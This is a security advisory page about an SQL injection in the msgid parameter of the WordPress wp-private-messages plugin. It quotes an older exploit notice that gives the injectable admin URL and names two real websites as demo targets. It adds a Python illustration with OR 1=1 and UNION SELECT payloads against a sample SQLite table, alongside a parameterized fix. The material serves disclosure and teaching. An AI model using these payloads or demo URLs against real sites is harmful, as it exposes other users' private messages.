WordPress wp-private-messages SQL Injection

2013.07.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

The WordPress wp-private-messages plugin suffers from an SQL injection vulnerability. The injection point in the published proof of concept is the msgid parameter of the reply action (wpu=reply) of wpu_private_messages.php, reached through wp-admin/profile.php, so a logged-in WordPress account is needed to hit it. The original advisory follows.

#################################
# Iranian Exploit DataBase
# Www.exploit.IrIsT.Ir
#################################
# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Home : http://exploit.IrIsT.Ir
# Software Link : http://wordpress.org/plugins/wp-private-messages/
# Security Risk : High
# Tested on : Linux
#################################
# Exploit :
# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# Dem0 :
# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#################################
# Vuln Source C0de :
# Line 145 :
# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");
# And Line 160 :
# echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";
#################################
# Exploit Archive : http://exploit.irist.ir/exploits-148.html
#################################
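The two source lines quoted in the advisory show the inbox listing (line 145, filtered by $current_user->ID) and the link that puts msgid into the reply URL (line 160); the query that actually consumes msgid in the reply handler is not quoted on this page. The example below is therefore an added illustration, not the plugin's code: it reconstructs the assumed pattern (msgid concatenated into a per-recipient lookup) against a constructed in-memory SQLite table that reuses the column names from the advisory, shows why a crafted msgid lets one recipient read another recipient's messages, and places the hardened lookup beside it. The table contents, the hypothetical function names and the `body` column are all assumptions. In the plugin itself the hardened form corresponds to `$wpdb->prepare()` with `%d` placeholders fed by `absint($_GET['msgid'])` and `$current_user->ID`.

```python
import sqlite3

# Constructed sample data (not from the plugin): a private-messages table using
# the column names quoted in the advisory (id, sender, rcpid, subject, date,
# status, tosee) plus an assumed body column so that leaked rows are recognisable.
SAMPLE_ROWS = [
    (1, 2, 5, "hello", "2013-06-30", 0, 1, "message for user 5"),
    (2, 3, 5, "re: hello", "2013-06-30", 0, 1, "another message for user 5"),
    (3, 4, 7, "private", "2013-06-30", 0, 1, "message for user 7 only"),
]


def make_db():
    """Build an in-memory SQLite stand-in for the wp_private_messages table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_private_messages ("
        "id INTEGER, sender INTEGER, rcpid INTEGER, subject TEXT, "
        "date TEXT, status INTEGER, tosee INTEGER, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_private_messages VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        SAMPLE_ROWS,
    )
    return conn


def fetch_reply_vulnerable(conn, current_user_id, msgid):
    """Assumed vulnerable pattern (hypothetical, not the plugin's code): the
    msgid taken from the query string is concatenated into the SQL text, so a
    quote or comment marker inside it rewrites the WHERE clause."""
    sql = (
        "SELECT id, sender, subject, body FROM wp_private_messages "
        "WHERE id = '" + msgid + "' AND rcpid = '" + str(current_user_id) + "'"
    )
    return conn.execute(sql).fetchall()


def fetch_reply_fixed(conn, current_user_id, msgid):
    """Hardened form: coerce msgid to an integer first and bind both values as
    parameters, the equivalent of $wpdb->prepare() with %d placeholders."""
    try:
        msgid_int = int(msgid)
    except (TypeError, ValueError):
        return []  # non-numeric id: nothing to look up, and no SQL built from it
    sql = (
        "SELECT id, sender, subject, body FROM wp_private_messages "
        "WHERE id = ? AND rcpid = ?"
    )
    return conn.execute(sql, (msgid_int, int(current_user_id))).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Legitimate use: user 5 opens message 1, which was addressed to them.
    print(fetch_reply_vulnerable(db, 5, "1"))
    # Injected msgid: the comment marker cuts off the rcpid check, so user 5
    # also receives the row addressed to user 7.
    print(fetch_reply_vulnerable(db, 5, "1' OR 1=1 -- "))
    # Targeted read of another recipient's mailbox via UNION.
    print(fetch_reply_vulnerable(db, 5, "0' UNION SELECT id, sender, subject, body "
                                        "FROM wp_private_messages WHERE rcpid = 7 -- "))
    # The hardened lookup rejects the payload and still serves the real case.
    print(fetch_reply_fixed(db, 5, "1' OR 1=1 -- "))
    print(fetch_reply_fixed(db, 5, "1"))
```

The recipient check (`rcpid = current user`) is what the plugin relies on to keep mailboxes separate; once msgid can terminate the string literal, that check is either commented out or bypassed with a UNION, which is why integer coercion plus parameter binding, rather than escaping alone, is the right fix for an id that is only ever numeric.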

References:

http://exploit.irist.ir/exploits-148.html


Copyright 2024, cxsecurity.com